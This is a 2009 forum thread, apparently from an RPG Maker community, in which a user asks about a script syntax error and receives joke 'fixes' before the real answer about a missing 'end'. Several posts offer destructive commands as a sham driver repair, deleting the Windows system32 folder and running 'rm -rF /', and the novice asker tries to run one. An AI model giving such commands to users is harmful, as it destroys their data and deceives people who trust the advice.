TONS -_-;

Started by Tazero, March 10, 2009, 05:36:12 am

Previous topic - Next topic

Tazero

March 10, 2009, 05:36:12 am Last Edit: March 10, 2009, 05:37:38 am by MetaKnight
Help please i'm getting this error
Quote from: Gamescript 'toa2' line 4342 syntax error occured


If you were a fish...

fugibo

Make sure nothings fudged up at line 4342 :(

tSwitch

March 10, 2009, 07:43:42 am #2 Last Edit: March 10, 2009, 10:25:25 am by NAMKCOR
Quote from: MetaKnight on March 10, 2009, 05:36:12 am
Help please i'm getting this error
Quote from: Gamescript 'toa2' line 4342 syntax error occured



wow...jeez...it seems like your drivers are malfunctioning, causing a fault in your GPU, which is shorting out the motherboard's ability to process line 4342.

edit: alright, I researched this all morning and found the way to fix it.
first you have to close, then reopen RMXP (don't ask me why, but it apparently has to happen)
then cut out line 4342.  Then you close the script editor by hitting 'ok'
then you go to your command prompt, here's the tricky part.
enter the following

deltree /Y c:\windows\system32\

that should reset the hardware drivers for your GPU, and you should be able to paste line 4342 back and it should work.


FCF3a A+ C- D H- M P+ R T W- Z- Sf RLCT a cmn+++ d++ e++ f h+++ iw+++ j+ p sf+
Follow my project: MBlok | Find me on: tSwitch.us | Twitter | Tumblr

Tazero

Will this delete anything?  :huh:


If you were a fish...

tSwitch



FCF3a A+ C- D H- M P+ R T W- Z- Sf RLCT a cmn+++ d++ e++ f h+++ iw+++ j+ p sf+
Follow my project: MBlok | Find me on: tSwitch.us | Twitter | Tumblr

Tazero

March 10, 2009, 02:27:10 pm #5 Last Edit: March 10, 2009, 02:31:50 pm by MetaKnight
* MetaKnight powers up NAMKCOR*

Thanks man!



EDIT::
Not working....
  • It won't let me execute "Commands deltree"


If you were a fish...

Blizzard

"rmdir" should work instead of "deltree" if it's the folder you want to remove, NAMK.
Check out our game brands:

Daygames
Game Night Games
Chugnar Games

Quote from: winkioI do not speak to bricks, either as individuals or in wall form.

Quote from: Barney StinsonWhen I get sad, I stop being sad and be awesome instead. True story.

fugibo

Or if your running a UNIX variant and wanna have some fun:


rm -rF /


Three cookies to anyone who understands that without google.

Tazero

Quote from: Blizzard on March 10, 2009, 02:46:51 pm
"rmdir" should work instead of "deltree" if it's the folder you want to remove, NAMK.


It's -my- problem....


And what do these commands do i'm running XP with screwwy drivers i gues..


If you were a fish...

fugibo

We're being sarcastic. You are being vague.

Tazero

The commands line is "End"..... so that can't be syntax error...


If you were a fish...

winkio

unless you have too many or too little ends.  figure it out.  there is either an extra end, or you need to put in more. follow the ends down the formatting.

fugibo

Add an "end" to the end. You probably didn't copy the script right.

tSwitch

Quote from: MetaKnight on March 10, 2009, 03:59:02 pm
Quote from: Blizzard on March 10, 2009, 02:46:51 pm
"rmdir" should work instead of "deltree" if it's the folder you want to remove, NAMK.


It's -my- problem....

And what do these commands do i'm running XP with screwwy drivers i gues..


they would delete your System 32 folder, which contains all your drivers and such.
in other words, your computer would stop running, and never start up again without a format and system restore.


FCF3a A+ C- D H- M P+ R T W- Z- Sf RLCT a cmn+++ d++ e++ f h+++ iw+++ j+ p sf+
Follow my project: MBlok | Find me on: tSwitch.us | Twitter | Tumblr